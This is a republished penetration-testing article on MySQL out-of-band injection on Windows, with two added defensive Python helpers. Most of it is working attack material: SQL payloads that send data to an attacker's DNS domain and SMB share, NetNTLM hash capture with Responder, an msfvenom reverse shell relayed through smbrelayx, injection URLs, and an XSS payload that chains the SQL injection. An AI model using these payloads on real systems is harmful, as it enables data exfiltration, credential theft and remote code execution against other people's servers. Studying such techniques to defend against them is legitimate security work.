
MySQL Out-of-Band Hacking

[Category: Database (mysql) | Posted by: 店小二05 | Date: 2017 | Author: 红领巾]
Overview

Out-of-band injections are very well researched when it comes to MSSQL and Oracle, but in MySQL I noticed that this topic is not well researched, so I decided to look into it based on my experience with SQL injections. For this purpose we can take advantage of functions such as load_file() and select … into outfile/dumpfile. Apart from that we can also steal NetNTLM hashes and perform SMB relay attacks. All of this is possible only in MySQL under Windows.

What is Out-of-Band Injection?

These attacks use alternative channels to extract data from the server: HTTP(S) requests, DNS resolution, file systems, e-mail, etc., depending on the functionality of the back-end technology.

Limitations in MySQL

In MySQL there exists a global system variable known as ‘secure_file_priv’. This variable is used to limit the effect of data import and export operations, such as those performed by the LOAD DATA and SELECT … INTO OUTFILE statements and the LOAD_FILE() function.

If set to the name of a directory, the server limits import and export operations to files in that directory. The directory must exist; the server will not create it. If the variable is empty it has no effect, which is an insecure configuration. If set to NULL, the server disables import and export operations. This value is permitted as of MySQL 5.5.53.

Before MySQL 5.5.53 this variable is empty by default, hence allowing us to use these functions. But in the versions after 5.5.53 the value ‘NULL’ will disable these functions.

To check the value of this variable you can use any of these methods. ‘secure_file_priv’ is a global, read-only variable, which means you cannot change it at runtime.

select @@secure_file_priv;
select @@global.secure_file_priv;
show variables like "secure_file_priv";

For example the default value in my MySQL 5.5.34 is empty, which means we can use these functions.


In MySQL 5.6.34 by default the value is NULL and this will disable import and export operations.
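As an added example (not part of the original paper), a small Python helper that applies the rules described in this section: it parses the server version, derives the built-in default of secure_file_priv, classifies the value returned by ‘select @@secure_file_priv’, and checks whether a given path would be accepted under a directory setting. The directory C:/ProgramData/MySQL/Uploads/ and the ‘-log’ version suffix are constructed sample values, and the path check is modelled on the rule this section states (the file must sit inside the directory), not on MySQL’s source.

```python
import ntpath
import re

def parse_version(version_string):
    """Turn a version string such as '5.6.34' (or '5.6.34-log') into (5, 6, 34)."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", version_string)
    if not m:
        raise ValueError(f"unrecognised MySQL version: {version_string!r}")
    return tuple(int(x) for x in m.groups())

def default_secure_file_priv(version_string):
    """Built-in default described above: empty before 5.5.53, NULL (None) from 5.5.53 on."""
    return "" if parse_version(version_string) < (5, 5, 53) else None

def assess_secure_file_priv(value):
    """Classify the value of 'select @@secure_file_priv': '' (empty), None (SQL NULL,
    printed as NULL by the client) or a directory. Returns (status, explanation)."""
    if value is None:
        return ("disabled", "LOAD DATA, SELECT ... INTO OUTFILE/DUMPFILE and LOAD_FILE() are disabled")
    if value == "":
        return ("unrestricted", "import/export may touch any path the server process can reach, "
                                "including UNC paths on Windows")
    return ("restricted", f"import/export limited to files under {value}")

def path_allowed(secure_file_priv, path):
    """Would the server accept 'path' under this setting? Modelled on the rule stated above
    (the file must live inside the directory); ntpath gives Windows path semantics, since the
    scenario on this page is MySQL on Windows."""
    if secure_file_priv is None:
        return False
    if secure_file_priv == "":
        return True
    base = ntpath.normcase(ntpath.normpath(secure_file_priv)) + ntpath.sep
    target = ntpath.normcase(ntpath.normpath(path))
    return target.startswith(base)  # '..' segments are collapsed first; UNC paths never match

if __name__ == "__main__":
    # Constructed sample values: the two server versions discussed on this page and a directory setting.
    for version in ("5.5.34", "5.6.34-log"):
        print(version, "default ->", assess_secure_file_priv(default_secure_file_priv(version)))
    uploads = "C:/ProgramData/MySQL/Uploads/"  # constructed directory setting
    for p in (r"C:\ProgramData\MySQL\Uploads\out.txt", r"\\192.168.0.100\temp\out.txt"):
        print(p, "->", path_allowed(uploads, p))
```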

Workaround

Here are a few workarounds I came up with to overcome this issue in versions after 5.5.53.

Starting the mysqld process with an empty “secure-file-priv=” parameter:

mysqld.exe --secure-file-priv=

Adding an entry in the “my.ini” configuration file:

secure-file-priv=

To find out the order in which the default options are loaded, and the paths to the configuration files, type this:

mysqld.exe --help --verbose

Pointing your configuration file to mysqld.exe

You can create a new file such as ‘myfile.ini’ and pass it to MySQL as the defaults file.

mysqld.exe --defaults-file=myfile.ini

The content of your configuration file:

[mysqld]
secure-file-priv=

Extracting Data to a File System

In MySQL we can use a shared file system as an alternative channel to extract data.

select @@version into outfile '\\\\192.168.0.100\\temp\\out.txt';
select @@version into dumpfile '\\\\192.168.0.100\\temp\\out.txt';
select @@version into outfile '//192.168.0.100/temp/out.txt';
select @@version into dumpfile '//192.168.0.100/temp/out.txt';

Note that if quotes are filtered you cannot use hex conversions or any other format for the file path.

Extracting Data using DNS Resolutions

Another channel that can be used in MySQL is DNS resolutions.

select load_file(concat('\\\\',version(),'.hacker.site\\a.txt'));
select load_file(concat(0x5c5c5c5c,version(),0x2e6861636b65722e736974655c5c612e747874));

You can clearly see the version 5.6.34 is sent along with the DNS query.

When MySQL tries to resolve the name, the query reaches the DNS server for ‘hacker.site’, where we can log the requests and extract the data. The data arrives as a subdomain.

When extracting data, note that you are dealing with DNS requests, so special characters cannot be used. Use MySQL string functions such as mid, substr, replace, etc. to work around this.

Stealing NetNTLM Hashes

As shown above, ‘load_file’ and ‘into outfile/dumpfile’ work fine with UNC paths under Windows. This can be used to resolve a non-existent host name: when DNS resolution fails, the request is sent as an LLMNR or NetBIOS-NS query. By poisoning LLMNR we can capture the NTLMv2 hashes.

Tools that can be used for this attack:

Responder
llmnr_response
MiTMf

I will be using Responder for this example. I’m running MySQL 5.6.34 on Windows 8 64-bit.

responder -I eth0 -rv

Next we can use ‘load_file’, ‘into outfile/dumpfile’ or ‘load data infile’ to resolve an invalid UNC path.

select load_file('\\\\error\\abc');
select load_file(0x5c5c5c5c6572726f725c5c616263);
select 'osanda' into dumpfile '\\\\error\\abc';
select 'osanda' into outfile '\\\\error\\abc';
load data infile '\\\\error\\abc' into table database.table_name;

SMB Relay Attacks

Using functions such as ‘load_file’, ‘into outfile/dumpfile’ and ‘load data infile’ we are able to access UNC paths under Windows. We can abuse this feature to perform SMB relay attacks and simply pop a shell on the target machine. Here’s a visual demonstration of the SMB relay attack.

This is my lab setup configuration for this experiment.

MySQL Server, Windows 8: 192.168.0.100
Attacker, Kali: 192.168.0.101
Victim, Windows 7: 192.168.0.103 (running as Admin)

Tools used:

smbrelayx
Metasploit

First of all I generate a reverse shell on my Kali box and run the ‘multi/handler’ module in Metasploit.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=443 -f exe > reverse_shell.exe

Next I run the ‘smbrelayx’ tool, specifying the victim IP address and my generated reverse shell, and wait for incoming connections.

smbrelayx.py -h 192.168.0.103 -e ./reverse_shell.exe

Once we execute any of these statements from the MySQL server we get our reverse shell from the victim box.

select load_file('\\\\192.168.0.101\\aa');
select load_file(0x5c5c5c5c3139322e3136382e302e3130315c5c6161);
select 'osanda' into dumpfile '\\\\192.168.0.101\\aa';
select 'osanda' into outfile '\\\\192.168.0.101\\aa';
load data infile '\\\\192.168.0.101\\aa' into table database.table_name;
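Because the same UNC path can be written quoted, hex-encoded or assembled with concat(), as the statements in this section and the DNS section show, a detector has to decode literals before matching. The following Python is an added example, not code from the original paper: it decodes hex and quoted literals in a statement (for instance a line from the MySQL general query log, assumed to be reduced to the statement text) and reports the host of any UNC-style path handed to load_file, into outfile/dumpfile or load data infile. The sample statements are constructed from the payload shapes on this page.

```python
import re

# Constructed sample statements modelled on the payload shapes shown on this page
# (quoted path, hex-encoded path, concat() with a host built at runtime); test data, not traffic.
SAMPLE_STATEMENTS = [
    r"select load_file('\\\\error\\abc')",
    r"select load_file(0x5c5c5c5c6572726f725c5c616263)",
    r"select 'osanda' into dumpfile '\\\\192.168.0.101\\aa'",
    r"select @@version into outfile '//192.168.0.100/temp/out.txt'",
    r"select load_file(concat(0x5c5c5c5c,version(),0x2e6861636b65722e736974655c5c612e747874))",
    r"select name from users where id = 0x41",          # hex literal, but no file function
    r"select load_file('C:\\temp\\local.txt')",         # file function, but a local path
]

FILE_FUNC = re.compile(r"\bload_file\s*\(|\binto\s+(?:out|dump)file\b|\bload\s+data\s+(?:local\s+)?infile\b", re.I)
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-fA-F]{2})+)\b")
QUOTED = re.compile(r"'((?:[^'\\]|\\.)*)'")
UNC_PREFIX = re.compile(r"^(?:\\{2,}|/{2,})([^\\/]*)")  # two or more leading separators, then the host

def decode_literals(stmt):
    """Yield each string literal in stmt as the value MySQL would actually use."""
    for m in HEX_LITERAL.finditer(stmt):
        # Hex literals are not escape-processed: 0x5c5c5c5c stays four backslashes,
        # which the statements above show Windows still accepts as a UNC prefix.
        yield bytes.fromhex(m.group(1)).decode("latin-1")
    for m in QUOTED.finditer(stmt):
        # Inside quotes MySQL collapses the escape '\\' to a single backslash.
        yield m.group(1).replace("\\\\", "\\")

def unc_targets(stmt):
    """Hosts of UNC-style paths handed to a file function in stmt.
    '' marks a path whose host is assembled at runtime, e.g. concat(0x5c5c5c5c, version(), ...)."""
    if not FILE_FUNC.search(stmt):
        return []
    hosts = []
    for lit in decode_literals(stmt):
        m = UNC_PREFIX.match(lit)
        if m:
            hosts.append(m.group(1))
    return hosts

def scan(statements):
    """Return (statement, hosts) for every statement that reaches out to a UNC path."""
    hits = []
    for stmt in statements:
        hosts = unc_targets(stmt)
        if hosts:
            hits.append((stmt, hosts))
    return hits
```

Run scan(SAMPLE_STATEMENTS) to see the five flagged statements; the local file read and the plain hex literal are left alone.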

These are the options in Metasploit from the module ‘multi/handler’.

Once the MySQL server sends a request to the Kali box, ‘smbrelayx’ performs the SMB relay attack, uploads our reverse shell and executes it.

If the attack is successful we get our reverse shell from the Windows 7 box.

Union and Error Based Injections

The ‘load_file’ function can be used with both union-based and error-based injections. For example, in a union-based scenario we can use OOB injections like this:

http://192.168.0.100/?id=-1'+union+select+1,load_file(concat(0x5c5c5c5c,version(),0x2e6861636b65722e736974655c5c612e747874)),3-- -

We can also use error-based techniques such as the BIGINT overflow method or the EXP error-based method:

http://192.168.0.100/?id=-1' or !(select*from(select load_file(concat(0x5c5c5c5c,version(),0x2e6861636b65722e736974655c5c612e747874)))x)-~0-- -
http://192.168.0.100/?id=-1' or exp(~(select*from(select load_file(concat(0x5c5c5c5c,version(),0x2e6861636b65722e736974655c5c612e747874)))a))-- -

Instead of ‘or’ you can use ||, |, and, &&, &, >>, <<, ^, xor, <=, <, >, >=, *, mul, /, div, -, +, %, mod.

XSS + SQLi

We can combine XSS attacks with MySQL, and these might come in handy in different penetration-testing scenarios. Both stealing NetNTLM hashes and SMB relay attacks can be combined with XSS. If the XSS is persistent, the victim is affected each time they visit the page.

Note that when dealing with JavaScript you are bound by the Same-Origin Policy (SOP).

<svg onload=fetch(("http://192.168.0.100/?id=-1'+union+select+1,load_file(0x5c5c5c5c6572726f725c5c6161),3-- -"))>

You can also use MySQL to echo out HTML, thus echoing out an invalid UNC path to steal NetNTLM hashes, or directly perform an SMB relay attack by using the IP of the attacker. These UNC paths get resolved only in the IE web browser.

http://192.168.0.100/?id=-1' union select 1,'<img src="\\\\error\\aa">'%23

Conclusion

The methods discussed here can be used when all in-band methods fail because the vectors are disabled, limited or filtered, and the only remaining option is inference techniques. ‘select … into outfile/dumpfile’ can be used with union-based injections. ‘load_file’ can be used with both union-based and error-based injections. When it comes to infrastructure hacking these methods can be very useful. Exploitation of a vulnerability is not always straightforward; you have to be creative in applying these techniques in real-world scenarios.

Acknowledgements

Special thanks to @m3g9tr0n for his support with my research.

Paper

https://packetstormsecurity.com/files/140832/MySQL-OOB-Hacking.html

References

https://dev.mysql.com/doc/refman/5.5/en/
https://pen-testing.sans.org/blog/2013/04/25/smb-relay-demystified-and-ntlmv2-pwnage-with-python
https://pentest.blog/what-is-llmnr-wpad-and-how-to-abuse-them-during-pentest/

Page URL: http://www.codesec.net/view/530229.html